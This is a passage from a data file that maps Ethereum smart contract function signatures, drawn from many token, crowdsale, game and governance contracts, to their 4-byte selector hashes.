"0x771ff086", "ZebiCoinTempMgr(address,address,address)": "0x934f92af", "ZebiCoinCrowdsale(uint256,uint256,uint256,address,uint256,uint256)": "0x279e79b5", "addCancellation(address)": "0x93b7e7cb", "takeEth()": "0x8a13aa4b", "forcedRefund(address)": "0xf83eb5dc", "viewContribution(address)": "0x5052abad", "disableRefundPeriod()": "0x848f1470", "enableRefundPeriod()": "0x6585dc12", "viewCancelledList(address)": "0xe3bb01ac", "resumeMint()": "0x1fe7b624", "finishMint()": "0xe4cc18be", "stockTokens()": "0xeb8136f3", "UTExchangeRate()": "0x6c97a812", "firstLockAmount()": "0x4c67567a", "scannedBronzeCaps()": "0x44b88a6d", "claimOwnersEarnings()": "0x8116c063", "angelPool()": "0x560334c6", "administror()": "0x1824461d", "drpuToken()": "0xa29d4859", "icoLimit()": "0x0beb90d3", "firstStageRaisedInWei()": "0xf2d805d5", "JOTUNSupply()": "0xeba66dc9", "reliabilityPercentage()": "0x402eb694", "endTimeLockedTokensAdvisor()": "0x850a7eca", "pause_2()": "0x97e4fdea", "icoWasSuccessful()": "0x18ad28af", "testing()": "0x8d03b102", "AIRDROP_SHARE()": "0x9f174c6f", "returnPtSafeLarge()": "0xee2269e5", "BRANDS()": "0xad22453c", "tokenXchangeRate()": "0x02d6e7f4", "auctions()": "0x85aa6103", "OWNER_CUT()": "0xafbc4ebc", "transformContract()": "0xbf12bf4f", "transaction_count()": "0xf7ff50e2", "bountyTokensAccount()": "0x9f8970dd", "club()": "0x0efd0973", "MAXSOLD_SUPPLY()": "0x6e349188", "SECOND_AUCTIONS_INITIAL_PERCENTAGE()": "0xd876c9c0", "developersTokens()": "0x2e3b96bf", "afterSoftCapDuration()": "0x63086b5e", "site()": "0xe0d370ac", "TOKEN_BONUS_RATE()": "0x753384fa", "initialIssueMinted()": "0x90f3b693", "artistFees()": "0x7b936934", "tokenPerUsdNumerator()": "0x63da5531", "deathData_f2()": "0xf08c9e2e", "marketingPercent()": "0xd8020a18", "ASK_STAKE_RATIO()": "0x6b14ea36", "icoBonus3EndDate()": "0xa07778ec", "mintingCap()": "0x3f23a566", "TokenForSale()": "0x4f0f97ab", "finishHim()": "0xda4077b9", "rf()": "0xbac506e0", "getRecipientString()": "0xf41b536e", "updateWeiAmountShare()": "0x1dc9186a", "FINAL_AML_DAYS()": "0xf1dbd547", "spendNonce()": "0x843b1a09", "teamTokensVesting()": "0x4628bc22", "setFixedRate()": "0xebea3d30", "forTeamCOT()": "0x7e466bb4", "minimalRewardedBalance()": "0xb263f638", "CONVERSION_DENOMINATOR()": "0xc2234f67", "pvtTokens()": "0x78c3f298", "PartnerUrl()": "0x67cb103a", "Nodalblock()": "0x81cedafc", "tokensFortorch()": "0x6ade9bd1", "bonusFirstTwoDays()": "0xbe3e41b1", "lockedTill()": "0xc72e57c7", "saleCapReached()": "0x3728aa4c", "preIcoSoldTokens()": "0x33c9b83c", "expiryEpoch()": "0xffa49c6a", "earliest_buy_time()": "0xf79dcf8d", "addressFundAirdrop()": "0x9256759c", "totalPerTokenPayout()": "0x4d6bc04e", "minePool()": "0x602e6623", "tier_cap_4()": "0xa6632904", "cliffTime()": "0x0f1a6444", "isRefundAllowed()": "0x376ff7f0", "TEAM_TOKEN_AMOUNT()": "0x1c60a158", "statusContribution()": "0x52d50408", "total_distribution()": "0x98ec9095", "STRC_ADDR()": "0x71147d32", "getTotalInvestedEur()": "0x2bbc50b5", "moneyFreeze()": "0xb4d927d0", "endMainSale()": "0x6ee64345", "calcTime()": "0x2be51660", "PRIVATESALE_SUPPLY()": "0xbf39ba48", "unholdFunds()": "0x72337396", "targetSupply()": "0x2a1eafd9", "weisPerBigToken()": "0x4cbc07f2", "gotParticipants()": "0x07f64725", "tokenSaleLowerLimit()": "0x4293253c", "endTimeTLP1()": "0xff7e17b6", "IcoSupply()": "0x51f550be", "contract_newOwner()": "0x97271615", "payoutCount()": "0x57831809", "fix()": "0xa551878e", "anotherOwner2()": "0xb5133189", "PUBLIC_SALE_LIMIT()": "0x4be5739e", "totaldeposited()": "0xd7315d60", "btcsAddress()": "0x3265c436", "gasPriceMaximum()": "0x6680624e", "token_claim_waiting_period()": "0x4b7829f1", "totalLux()": "0x585bf3e4", "getPlayerName()": "0xa69c6597", "hitFoundationBalance()": "0x63c281a1", "BATTLE_CASUALTIES()": "0xbbbf9384", "PRICE_INCREASE_SCALE()": "0x1bd8b041", "maxNumMC()": "0xe3688d7a", "yearlyMintCap()": "0x0a24c5bb", "Calculator()": "0x3441ecf2", "_setAuth(address,address)": "0x412661c4", "checkPermission(address,address,bytes4)": "0x8ad2f289", "queryAllAccounts()": "0xd28d4e0c", "queryAccounts(address)": "0x223964bc", "queryPermissions(address)": "0x945a2555", "clearAuthOfPermission(address)": "0x372cd7ad", "clearAuth(address)": "0xb4026ed5", "cancelAuth(address,address)": "0x0c0a5c55", "setAuth(address,address)": "0xf10a7798", "Authorization(address)": "0x758e08d0", "getCategoricalMarketNumTicks(uint256)": "0x893b8b0a", "getInitialREPSupply()": "0xea2a33fc", "getDefaultReportingFeeDivisor()": "0x62f927d4", "getMinimumReportingFeeDivisor()": "0xfd61a725", "getMaximumReportingFeeDivisor()": "0x28f4c7de", "getForkMigrationPercentageBonusDivisor()": "0xd9a52ab3", "getTargetRepMarketCapDivisor()": "0xb9c89ff7", "getTargetRepMarketCapMultiplier()": "0x2e19599c", "getTargetDesignatedReportNoShowsDivisor()": "0x5c4d3609", "getTargetIncorrectDesignatedReportMarketsDivisor()": "0x748ed9a8", "getTargetInvalidMarketsDivisor()": "0xe26ba086", "getValidityBondFloor()": "0xcc3c2c01", "getDefaultValidityBond()": "0xa7603a86", "getDefaultReportingGasPrice()": "0x9a74c10c", "getGasToReport()": "0xa740a194", "getForkDurationSeconds()": "0x87f06ec0", "getClaimTradingProceedsWaitTime()": "0xfb4fbcd8", "getDisputeRoundDurationSeconds()": "0x3a531998", "getDesignatedReportingDurationSeconds()": "0x9ea71c37", "addAddress(address)": "0x38eada1c", "set(string,uint256)": "0x8a42ebe9", "resolveChallenge(bytes32)": "0xd32c943a", "challengeCanBeResolved(bytes32)": "0x77609a41", "propExists(bytes32)": "0x35300990", "canBeSet(bytes32)": "0xc51131fb", "processProposal(bytes32)": "0x30490e91", "challengeReparameterization(bytes32)": "0x8240ae4b", "proposeReparameterization(string,uint256)": "0xbade1c54", "Parameterizer(address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x0490540b", "transferFrom(address,address,uint256,bytes32)": "0x401e3367", "approve(address,uint256,bytes32)": "0x8180f2fc", "transferWithReference(address,uint256,bytes32,string)": "0x6e293817", "getConfig(bytes32)": "0x6dd5b69d", "setSmartContractStatus(uint8)": "0xc674e0c9", "getCollaborated(uint256)": "0xa8f8c6de", "getBuyRequestCount()": "0x674197f8", "exitBuyRequest(uint256)": "0x61d81aed", "joinBuyRequest(uint256)": "0x25f3f2ef", "addBuyRequest(bytes32,address)": "0x921233b9", "executeBuyRequest(uint256)": "0x2dbffa6a", "deleteBuyRequestInternal(uint256)": "0x6807f752", "GroupBuy(address)": "0xca579642", "CastVote(bool)": "0xbfcdca48", "winnerCount()": "0xcaa02e08", "UpdatePlatformContract(string,address)": "0x42e5da0d", "Hub()": "0x68e2076a", "Lockup12m(address)": "0x877cedb8", "CentrallyIssuedToken(address,string,string,uint256,uint256)": "0xb16deab2", "setMetadata(string)": "0xa49a1e7d", "removeModuleAtIndex(uint256)": "0x711748a3", "setModuleAddress(string,address,bool)": "0x8622031f", "setABIHashForMod(bytes32,bytes)": "0xfa55afe2", "getABIHashForMod(bytes32)": "0xd1ce017c", "initializeABIHashForMod(uint256,bytes)": "0x71f90fe6", "initializeModuleAddresses(address[])": "0xd095edb2", "Main(string,bytes)": "0x13f5ef00", "moduleAddress(string)": "0x3acfc185", "Module(address)": "0xfe1cdbb8", "mint(int256,address,uint256,uint256)": "0xad7bafc7", "TokenModuleManager()": "0x76e51e96", "intunderflow(uint256)": "0x3205c5c1", "intoverflow_mul(uint256)": "0x5db7ef3d", "intoverflow_add(uint256)": "0xa3b01f23", "expiresAfter(address,uint256)": "0x9e813938", "claimReporterReward(address)": "0x29b1e640", "isGuilty(address)": "0x4c1344b7", "whatIsMissing()": "0xaede879d", "isClean(address)": "0xe2b2579b", "signup(uint256)": "0x8843ffba", "propagateRequest(address,uint256,bytes32,bytes32)": "0x5bba6a7c", "transitivePath(bytes32,bytes32,bytes32)": "0x27a5b3bc", "requestObjectRoot(bytes32,uint256,uint8,bytes32,bytes32)": "0xed23e5b7", "newRequest(address,uint256,bytes32)": "0x182b434b", "presentObject(bytes,bytes32)": "0xde71c467", "addRef(bytes32,bytes32)": "0xa7542448", "testMath()": "0xb073e2b7", "testAccessControl()": "0xcd9847bc", "add(string,string)": "0xebdf86ca", "getWHGDonationAddress()": "0x64dab283", "getTotalFunds()": "0xeb8bbd28", "getMyBalance(address)": "0x7e3ef7cd", "getPaidOut(address)": "0x57211ac0", "extendClosingTime(uint256)": "0x3e2640d6", "claimRemaining()": "0xc01c1ca3", "proxyWithdraw(address,uint256,uint8,bytes32,bytes32)": "0xe3ce9714", "commonWithdraw(address,address,uint256,uint256)": "0x04ebb1d9", "calculateWithdraw(address)": "0x02ef6c86", "WhitehatWithdraw(address,address,address,address)": "0x1c084385", "spread(address[],uint256[])": "0x2b071e47", "setBarrierAsOpen(bool)": "0x20b519bb", "IRONtoken()": "0xfd004f2d", "reclaimChildOwnership(address)": "0x219caaa9", "recoverETH_SendbyMistake()": "0xf68f1a0c", "PayRollHistory(address)": "0x1866ae7d", "_HOLDersPayRoll()": "0x7d580939", "UpdateHOLDer(address,address)": "0xf3616a90", "AddHOLDer(address)": "0x87040a86", "_alreadyInList(address)": "0x7ee26e63", "MorrowToken()": "0x7fcb2386", "DTT()": "0x4dd8aefd", "_time()": "0x57d15c6a", "IPcoin()": "0x9095b2cd", "PerkscoinToken(uint256)": "0x86116c12", "FINCO()": "0xff8f7551", "PoWH4D()": "0x20b0eafb", "AML()": "0xf31e3e84", "setUserWithdrawalAccount(address)": "0xfe35530c", "SmartWallet(address,address,address)": "0x4e0ade00", "TLTContract()": "0x1ee04a3d", "TheNextBlock()": "0xfedce093", "safeGetPercent(uint256,uint256)": "0xa70ce015", "foreignBuy(address,uint256,uint256)": "0x4d23aaa8", "foreignBuyTest(uint256,uint256)": "0x7e4a82b1", "setAuction(uint256,uint256,uint256)": "0x6d56d9f4", "changeFinishSale(uint256)": "0x56216916", "changeMinTokenSale(uint256)": "0x4386fe0d", "changeStartSale(uint256)": "0x4a58c409", "changeRateSale(uint256)": "0x72fd1a7c", "globalPause(bool)": "0x87c1be6e", "deleteCustomer(address)": "0x11c9ccf6", "importCustomer(address,address,uint256)": "0x0d78bc17", "checkCustomer(address)": "0xa197c042", "registerCustomer(address,address)": "0xb763150d", "deleteCertificate(string)": "0x81f6bf7d", "checkCertificate(string)": "0xffbd4dd5", "editCertificate(string,address)": "0x776b37e2", "addCertificate(string,address)": "0x0fe8c788", "changeRelease18m(address)": "0xaccfa48b", "changeRelease12m(address)": "0x7b424c0d", "changeRelease6m(address)": "0xfc385d51", "proceedKYC(address)": "0x74703123", "changeRestricted(address)": "0xfd93bdb1", "changeCertBot(address)": "0xd346feb8", "changeRegisterBot(address)": "0xac7cda53", "changeCourse(uint256)": "0x011b29e3", "changefirst24Percent(uint256)": "0xbf30d943", "ArconaToken(uint256,uint256,address,address,address,address,address,address,address)": "0x1e7401d9", "unMint(address)": "0x4e6e5d69", "changeReleaseAccount(address,address)": "0xc6bf03dd", "checkReleaseAt(address)": "0x8c8ee490", "updateIcoEnding(uint256)": "0x9e4d4d0c", "refundPayment()": "0xb65412b5", "addInvestment(address,uint256)": "0x20987e64", "bonus(address)": "0xd8cb4aa3", "GiftCrowdsale(uint256,uint256,uint256,uint256)": "0x11f03b83", "walletCreatedTimestamp(address)": "0x5e29c47c", "walletData(address)": "0xc46df008", "updateWallet(address,string)": "0x3d6c4df7", "addWallet(address,string)": "0xc28aafb1", "setBackendAddress(address)": "0x1815ce7d", "setIcoAddress(address)": "0xbd792db3", "GiftToken(address)": "0xa8d51f7e", "burnInternal(address,uint256)": "0x353c0573", "REFERPAYToken()": "0xe3625dee", "BOT_ELEMENT_2()": "0xa05190f4", "LYFToken()": "0xbd70c53a", "eAccessTOKEN()": "0x54619b69", "createFashion(address,uint16[9])": "0x753b0dc1", "controllerMint(address,uint256)": "0x5d7b0758", "controllerBurn(address,uint256)": "0x90596dd1", "WLCoin()": "0x26744071", "getReceiverAddress()": "0x531ebce5", "AlicToken()": "0x2aaa9de1", "FeuzingToken()": "0x05c8a4e2", "ImperialCreditToken()": "0xd0142c47", "Mithril()": "0x1b753dad", "SkrumbleToken()": "0xf2c9e0ed", "EthTeamContract(string,string,address,uint64,uint64,address)": "0x2c425687", "cancelOrder()": "0x6a816548", "confirmOrder()": "0xa00f198a", "getPreorderInfo()": "0x38c8e611", "PreOrder(address,address,address,address,address,bytes32,uint256,uint256,uint256,uint256,uint256)": "0x7617fbbd", "getHouseInfo(bytes32)": "0xe495f08e", "getUUIDS(bytes32)": "0x76235b49", "getPreorders(bytes32)": "0x2134214b", "getHostOrders(address,address)": "0x677c102d", "getGuestOrders(address,address)": "0x872f2526", "getHostRoomLists(address,address)": "0xfa3c9bbc", "setHouseInfo(bytes32,uint256,string,bytes32)": "0xbae118f4", "preOrder(address,address,address,address,bytes32,uint256,uint256,uint256)": "0x0c5fd414", "getDistrictCode()": "0x0d1efd7d", "setDistrictCode(bytes32)": "0x8c943b6c", "HouseInfoListing(address)": "0x32f2bb50", "approveAndCall(address,uint256,address,address,bytes32,uint256,uint256,uint256)": "0xda801f20", "PopulStayToken()": "0x33a9824a", "Mundo()": "0x1cf19ad7", "lotteries()": "0x07f90e5d", "ETHLotteryManager()": "0x3b3783e7", "BitstartiToken(uint256,string,string)": "0x72f65dea", "getWizzPandaCountOf(uint256)": "0xf3817b23", "getWizzPandaQuotaOf(uint256)": "0x818438ca", "clearWizzType(uint256[2])": "0x3010b5cd", "getWizzType(uint256[2])": "0x7c59f828", "getSex(uint256[2])": "0xe6898a7d", "getPureFromGene(uint256[2])": "0xdc1279d4", "mixGenes(uint256[2],uint256[2],uint256,uint256,uint256)": "0x7892cabf", "changeDevAddress(address)": "0x92b46390", "Contribution(address,address,uint256)": "0x71be8766", "priceRate()": "0xceb791d9", "changeFoundationAddress(address)": "0x4b11452c", "FolioNinjaToken(address,address,uint256,uint256)": "0xd29543af", "revertFunds(address,address,uint256)": "0x6fa4c766", "WikiToken()": "0xf6c98dd7", "LandToken()": "0xaab0395b", "DazzioCoin()": "0xd79f5678", "changeTokenMinter(address)": "0xc9dca9ba", "registerPayments(address[],uint256[],uint256[])": "0x96581de1", "registerPayment(address,uint256,uint256)": "0xead1ed5b", "getWeiLeft()": "0x122e74f4", "mintTokenToBuyer(address,uint256,uint256)": "0xb8894fe3", "removeFromFreezedList(address)": "0x7efe294c", "PlayHallToken()": "0x258d3d6e", "calculateTokenAmount(uint256,uint256)": "0x03553835", "Bastonet()": "0x6f4b31cc", "QuasaCoinExchanger()": "0xf8d3a26a", "mintProxy(address,uint256)": "0x6d6c0ec4", "mintProxyWithoutCap(address,uint256)": "0x34d2c4cb", "Helex()": "0x4fecf9cf", "CELToken()": "0x50051c20", "getCanSellUnit(address,address,uint256)": "0xe06b5837", "withdrawEtherFromTrade(uint256)": "0x63c78e87", "sellCards(uint256,uint256)": "0x9a5c0abc", "buyRareItem(uint256)": "0x9e30dd5f", "buyUpgradeCard(uint256)": "0xc3059c63", "buyEthCards(uint256,uint256)": "0x1c60f3bb", "buyBasicCards(uint256,uint256)": "0x3702ab03", "sendGiftCard(address,address)": "0x31985b51", "removeUnitMultipliers(address,uint256,uint256,uint256)": "0x52d214a7", "upgradeUnitMultipliers(address,uint256,uint256,uint256)": "0x5edc9bff", "setRareAddress(address,address)": "0x751827ac", "setConfigAddress(address,address)": "0x23343af3", "setCardsAddress(address,address)": "0xfcd778da", "rareStartPrice()": "0xb4d0e552", "setRarePrice(uint256,uint256)": "0x73a55389", "transferTokenByContract(uint256,address)": "0xda3678df", "getRareInfo(uint256)": "0x275babee", "getRareItemsPrice(uint256)": "0x103d26ac", "getRareItemsOwner(uint256)": "0x72eefb8a", "getBattleCardInfo(uint256,uint256,uint256)": "0xb2570b1c", "getCardInfo(uint256,uint256,uint256)": "0xee4827ea", "getUpgradeCardsInfo(uint256,uint256)": "0x73f9421d", "getCostForCards(uint256,uint256,uint256)": "0x320cffcd", "unitCoinProduction(uint256)": "0x702123ae", "getMaxCAP()": "0x341367ec", "getPlayersBattleStats(address)": "0x80fa7902", "getUnitsInProduction(address,uint256,uint256)": "0x97ce3a4b", "getUintCoinProduction(address,address,uint256)": "0xafa0f8c9", "setUintCoinProduction(address,address,uint256,uint256,bool)": "0x41eb1a4a", "setUnitJadeStealingMultiplier(address,address,uint256,uint256,bool)": "0xc8f803f8", "setUnitJadeStealingIncreases(address,address,uint256,uint256,bool)": "0xf435d012", "setunitDefenseMultiplier(address,address,uint256,uint256,bool)": "0x22db61ab", "setUnitDefenseIncreases(address,address,uint256,uint256,bool)": "0xf6cc7d60", "setUnitAttackMultiplier(address,address,uint256,uint256,bool)": "0x585da351", "setUnitAttackIncreases(address,address,uint256,uint256,bool)": "0x29bf56c3", "setUnitCoinProductionMultiplier(address,address,uint256,uint256,bool)": "0xb7d65d17", "getUnitCoinProductionMultiplier(address,address,uint256)": "0x2ec6b4f6", "setUnitCoinProductionIncreases(address,address,uint256,uint256,bool)": "0x798a970b", "getUnitCoinProductionIncreases(address,address,uint256)": "0x3d1ea04a", "getUnitsProduction(address,uint256,uint256)": "0x2d171243", "getAttackRanking()": "0x5b07371e", "getRanking()": "0x1398bbf7", "getTotalUsers()": "0x9be572f6", "AddPlayers(address,address)": "0x20834ed0", "getNextSnapshotTime()": "0x857f4864", "setNextSnapshotTime(uint256)": "0x32b7214e", "setTotalEtherPool(uint256,uint8,bool)": "0x358cfa25", "getTotalEtherPool(uint8)": "0x93a52980", "setUpgradesOwned(address,uint256)": "0x2a288272", "getUpgradesOwned(address,uint256)": "0xe946ad4a", "setOwnedCount(address,uint256,uint256,bool)": "0xe7001b84", "getOwnedCount(address,uint256)": "0x196ecd25", "setUintsOwnerCount(address,address,uint256,bool)": "0xd5722518", "getUintsOwnerCount(address,address)": "0xbd733dfb", "reducePlayersJadeProduction(address,uint256)": "0x396e70e0", "increasePlayersJadeProduction(address,uint256)": "0x79c310a6", "updatePlayersCoinByOut(address)": "0xe3cbe744", "updatePlayersCoinByPurchase(address,uint256)": "0xa1c90a11", "setRoughSupply(uint256)": "0x448a0ceb", "setLastJadeSaveTime(address)": "0x176854f6", "setJadeCoinZero(address)": "0xbff179c4", "setJadeCoin(address,uint256,bool)": "0xa6678b60", "setCoinBalance(address,uint256,uint8,bool)": "0x54605549", "coinBalanceOf(address,uint8)": "0xe8d320e6", "balanceOfUnclaimed(address)": "0x4676b897", "getGameStarted()": "0x9267b291", "getUpgradeValue(address,uint256,uint256,uint256)": "0x832e02ef", "getJadeProduction(address)": "0x41da7538", "setAutoAddress(address,address)": "0x23f14e86", "CardsAccess()": "0xac440d13", "reclaim(address,uint256)": "0x8bd317eb", "getPrices()": "0xbd9a548b", "getOwnerBalance(address)": "0x7fcf440a", "setEthWallet(address)": "0x9a3c4158", "setDistributionMinimum(uint16)": "0xa0d63f7e", "distributeTokens(address)": "0xb1d17c98", "lockShares()": "0xb75c2068", "sendOwnership(address,uint256)": "0xe2d0d519", "setOwnerShare(address,uint256)": "0xdcac652e", "startContribution()": "0x897463aa", "whitelistWallet(address)": "0x787c23e0", "PointPowerCoin()": "0xe4e0bd1f", "EtherLite()": "0x23d27633", "transferTokenOwnership()": "0x4056675e", "mintPredefinedTokens()": "0x95ed857c", "setMinimumContribution(uint256)": "0xdba3e704", "setLimit(address[],uint256)": "0x78984793", "setWhitelistingAgent(address,address,bool)": "0x670e64c8", "updateAllowedTransfers(address,address,bool)": "0x3f9b8fdc", "MeshToken()": "0x95fbdcd9", "changePhaseToICO()": "0xa0ad04c0", "generateTokens(uint256)": "0xca01ba39", "Gmt()": "0x6266e135", "EnterCoin()": "0xba8a141f", "MMCC()": "0x0bd12120", "_createOfAthlete(address,string,address,uint256,uint256,uint256)": "0x46e0c223", "tokenOfOwner(address)": "0x294cdf0d", "getAthlete(uint256)": "0x939b73aa", "createContractOfAthlete(string,address,uint256,uint256,uint256)": "0x57446636", "createPromoAthlete(address,string,address,uint256,uint256,uint256)": "0x787dc68f", "AthleteTestToken()": "0x88203417", "setLockAfterManuallyMint(bool,int256)": "0xce8b5b60", "unlockBatchOfAddressesAfterITO(address[])": "0xa2fd0179", "unlockAddressAfterITO(address,address)": "0x92c5769d", "lockAddressAfterITO(address,address)": "0xbdc4843a", "unlockAddressDuringITO(address,address)": "0xbc4e3105", "drain(uint256)": "0xf6b19c74", "KITTOKEN()": "0x93b4a73c", "changeWalletAddress(address)": "0xec8edf7a", "unlockAdvertisement(uint256)": "0x12a3234c", "VoteAdvertisement(uint256,address)": "0xaa6e4858", "AdvertisementPayout(uint256)": "0xfa3b8f2c", "uploadAdvertisement(uint256,string,address,uint256)": "0x65995cc8", "get_token_state()": "0x88c4e888", "remaining_for_sale()": "0x01f6dad0", "setOwnerPrice(uint128)": "0xfa6a0712", "PlusCoin()": "0xe65af219", "recoveryPaymentDigest(bytes32,uint256)": "0xc32a88ae", "paymentDigest(bytes32,uint256)": "0x41b6fcf7", "isOpen(bytes32)": "0x7c35be7a", "isSettling(bytes32)": "0x6683f9ae", "isAbsent(bytes32)": "0x60546602", "isPresent(bytes32)": "0x00f31e76", "claim(bytes32,uint256,bytes)": "0x7964ea87", "canClaim(bytes32,uint256,address,bytes)": "0xec8be5b9", "settle(bytes32)": "0x987757dd", "canSettle(bytes32)": "0xad379089", "startSettling(bytes32)": "0xe62eea47", "canStartSettling(bytes32,address)": "0x4722361c", "canDeposit(bytes32,address)": "0x2f8f0c92", "open(bytes32,address,uint32)": "0xba6cc6c3", "TAGCASH()": "0x707dd840", "VISTAcoin()": "0x87adab57", "forgiveThis(address)": "0x11506d4b", "forgiveMeOnBehalfOf(address)": "0xa3c1d83d", "forgiveMe()": "0xd650cb2e", "addAddressToIndex(address,address)": "0x4312fece", "updateFlagCount(address,address,uint256)": "0xe3f10188", "forgiveIt(address)": "0xbbee1ab7", "markAsScam(address)": "0x7739ad70", "ScamSeal()": "0xdf922744", "ScamSealToken()": "0x1af6b60f", "saveRevenueShareDistribution(address,uint256)": "0xb9727f50", "addRevenueShareCurrency(address,string)": "0x8d9b449b", "activateRevenueShareReference(uint256)": "0x4621a5d9", "COSSToken()": "0xe3e98cad", "transferOwnershipWithHowMany(address[],uint256)": "0xe8518341", "transferOwnership(address[])": "0x18bcd3d0", "deleteOperation(bytes32)": "0xf510371a", "Multiownable()": "0x1add5486", "allOperationsCount()": "0x22f2f89a", "tokenFallBack(address,uint256,bytes)": "0x9a3fd1fb", "BlockClout()": "0x20907d9a", "is_success()": "0xc6b0ffd0", "mint_for(address,uint256)": "0x6b04f110", "migrate_game_balance()": "0x9148148b", "init_dev_and_presale_allocation(address,address,address)": "0xee6ef19f", "init_bounty_program(address)": "0x12b2ecc6", "init_crowdsale(address)": "0xe51f95cc", "ProspectorsGoldToken()": "0xa1c308d0", "migrate_participant(address)": "0x17645315", "ECPoints()": "0x831a1a3c", "updateCaller(address,bool)": "0xdfbed623", "TokenCoin()": "0x8a8c8c42", "getServerAddress()": "0xc7acae2e", "setServerAddress(address)": "0x47b64eb0", "setOwnerAddress(address)": "0x331a6bf5", "LKLZ()": "0xa198a418", "_isOwner(address,uint256)": "0xc97399d0", "getTimeFromPrize()": "0xfeadfdbd", "asset(uint8,string,bytes)": "0xdcf7c2f9", "startBidding(uint256)": "0xa09e9c1d", "transferComplex(address,uint256,uint256)": "0xc50cb9ae", "transferFrozenTokens(address,uint256)": "0xa5ad0588", "transferAdvisor2Tokens(address,uint256)": "0xee1374a2", "transferAdvisor1Tokens(address,uint256)": "0x300d55a5", "transferTeam2Tokens(address,uint256)": "0x5da96520", "transferTeam1Tokens(address,uint256)": "0x070816f1", "transferBountyTokens(address,uint256)": "0xa6c95de1", "transferReserveFundTokens(address,uint256)": "0xe51e3c61", "AquaToken()": "0x02e0d5a5", "dividendsOf(address,address)": "0x60a31921", "withdrawPowhDivs()": "0x086df89e", "reinvestTokens(address)": "0x2359bd08", "mintTokens(uint256,address)": "0x10c5b328", "takeProfit()": "0x70c10578", "getBlocktime()": "0x0501b79f", "getLockingTimestampTo()": "0x076fdf3c", "getLockingTimestampfrom()": "0x10e7e89f", "setLockingTimestampFromTo(uint256,uint256)": "0x2f7146cc", "MYPPToken()": "0x968be45d", "getCurrentDay(uint256,uint256)": "0xa71bd1cd", "strongHands(address)": "0x9b8b03a2", "acceptSacrifice(uint256)": "0x27f2402b", "NKHOIToken()": "0x7afc84df", "readLib()": "0x5ac9e90f", "fillAmount()": "0xacd00a5c", "fill(uint256)": "0x3fda5389", "getSenderSig()": "0xa2d819b4", "getSenderValue()": "0x231da56e", "getSenderAddress()": "0x42948e18", "Token3D()": "0xd2558fca", "AcceptsToken3D(address)": "0x77f051c3", "VoteZoneToken()": "0xf2d73dc6", "Xinfin()": "0x30ae8d0c", "eth(uint256,uint256)": "0x377c6a3e", "keys(uint256,uint256)": "0x8b935fb1", "remainTime(uint256)": "0xa35bc497", "priceForKeys(uint256,uint256)": "0x6247cfd9", "withdrawalRound(address,uint256)": "0x016474ce", "retrieveEarnings(address)": "0x1d59cde3", "reloadRound(address,uint256)": "0x42e59afa", "ReloadKeys(uint256,uint256,uint256)": "0x60f5d0d8", "BuyKeys(uint256,uint256)": "0x159c2d9f", "core(uint256,address,uint256)": "0xd922aa30", "logRef(address,uint256)": "0xd08bc007", "calculateMasked(address,uint256)": "0x6ed9c19f", "profit(address)": "0x02550e4d", "roundProfit(address,uint256)": "0x4cfb4c28", "roundProfitByAddr(address,uint256)": "0xfad60615", "start1stRound()": "0x20b0747f", "agree(uint256,address)": "0x1cdef3ed", "ownerTake(uint256,address)": "0x7e4241b4", "_burnToken(address,uint256)": "0xd5f7b144", "_hasEntryForCompetition(address,uint256)": "0xdbf1f780", "setCompetitionAdmin(address)": "0x5e0ff394", "getEntriesCountForCompetition(uint256)": "0x6cdb3389", "getActiveEntryById(bytes32)": "0x03240775", "getOwnedActiveEntry(uint256)": "0xe481ebf0", "refundParticipants(uint256)": "0xe125501f", "payoutWinners(uint256,address[],uint256[])": "0xafe38ade", "submitEntry(uint256,uint256,uint256,uint256)": "0xb85c2f72", "getBlipTokenAddress()": "0xb55ad27e", "setBlipTokenAddress(address)": "0xc20a20d6", "BlipCompetition(address)": "0xfcef09d6", "_mint()": "0xc0702d9c", "BlipToken(string,string)": "0x4cf8b0f5", "BetTest111()": "0x78375f61", "CashPoints1()": "0xfbf42072", "ProudOfYourCoin()": "0x7973b370", "get10Tokens()": "0x07910a78", "DockCrowdsale(uint256,address,address)": "0x4c8d1e42", "DockToken(address)": "0x015ccd07", "Child()": "0x9e254d13", "RachelToken()": "0x92b1b0ce", "MiIToken(uint256,string,uint8,string)": "0x247b127d", "TJ2()": "0x21d1b7a4", "ReactioonToken()": "0x863c607c", "darkcoin()": "0xbedddbc4", "updateVotingContractAddress(address)": "0x7cf2b9e4", "setVotingContractAddress(address)": "0x62b08e70", "getNumberOfEligibleMembers()": "0x638dd56a", "replaceBoardMembers(address[])": "0x8a31ffda", "resignOwnMembership()": "0xd56f279f", "isRegularOrBoardMember(address)": "0x24fe73fe", "hasConfirmedApplicant(address,address)": "0x07a9d7a8", "confirmApplication(address)": "0xfb213549", "applyForMembership(string)": "0xd3b302e7", "getNumberOfMembers()": "0x8b73a46b", "alliance(address,address)": "0xc98d3457", "owner(address,address)": "0x076c4870", "user(address)": "0x81e7e20e", "root(address)": "0x6e5ac882", "store(bytes,address,address,uint256,uint8,uint8)": "0xc7420a9f", "user()": "0x4f8632ba", "badge(address,uint256)": "0x3253277c", "rank(address,uint256)": "0xf550cb45", "updateSecondWallet(address)": "0x480b9707", "updateFirstWallet(address)": "0xc99b27ad", "WithdrawFee(uint256)": "0xa01cb43d", "greylist(address)": "0x31ca208c", "changeAcct3(address)": "0xbbf2a9a3", "changeAcct2(address)": "0x520ba154", "AiToken(uint256)": "0x59626877", "Mpay(uint256,string,string)": "0x2fa5620a", "SGDsToken()": "0x38164d41", "MMToken(uint256,string,uint8,string)": "0x991feab5", "Lotoblock()": "0xd1180c98", "withdrawMILs(uint256)": "0xccfc0053", "awardMILsTo(address,uint256)": "0x56848c05", "MSECStandardToken(uint256,string,uint8,string)": "0x72142c67", "collectSellFee()": "0x4eb5162e", "collectFee(uint256)": "0xa969ff0a", "DSCToken(uint256,address)": "0xabb46619", "unTrackToken(address,uint16)": "0xa7be2648", "trackToken(address)": "0x39639fbd", "addPayees(address[],uint256[])": "0x53844552", "transferCheques(address,address,uint256,uint256)": "0xf6174b90", "getUnclaimedTokenAmount(address,address)": "0x58a3d1a1", "claimToken(address,address)": "0xca31879d", "claimEthFor(address)": "0x2656455f", "LowcarbonToken()": "0xe652ca86", "hasUserWon(uint8,uint256,bytes32,bytes32)": "0x15ea426d", "maxBet(uint256)": "0x21ab13ab", "Baxgold()": "0x7cfa1133", "registerNameCore(uint256,address,uint256,bytes32,bool,bool,uint8)": "0x5bb2b102", "registerNameXaddr(string,address,bool,uint8)": "0x0ab4ca55", "registerNameXID(string,uint256,bool,uint8)": "0xd9575ec5", 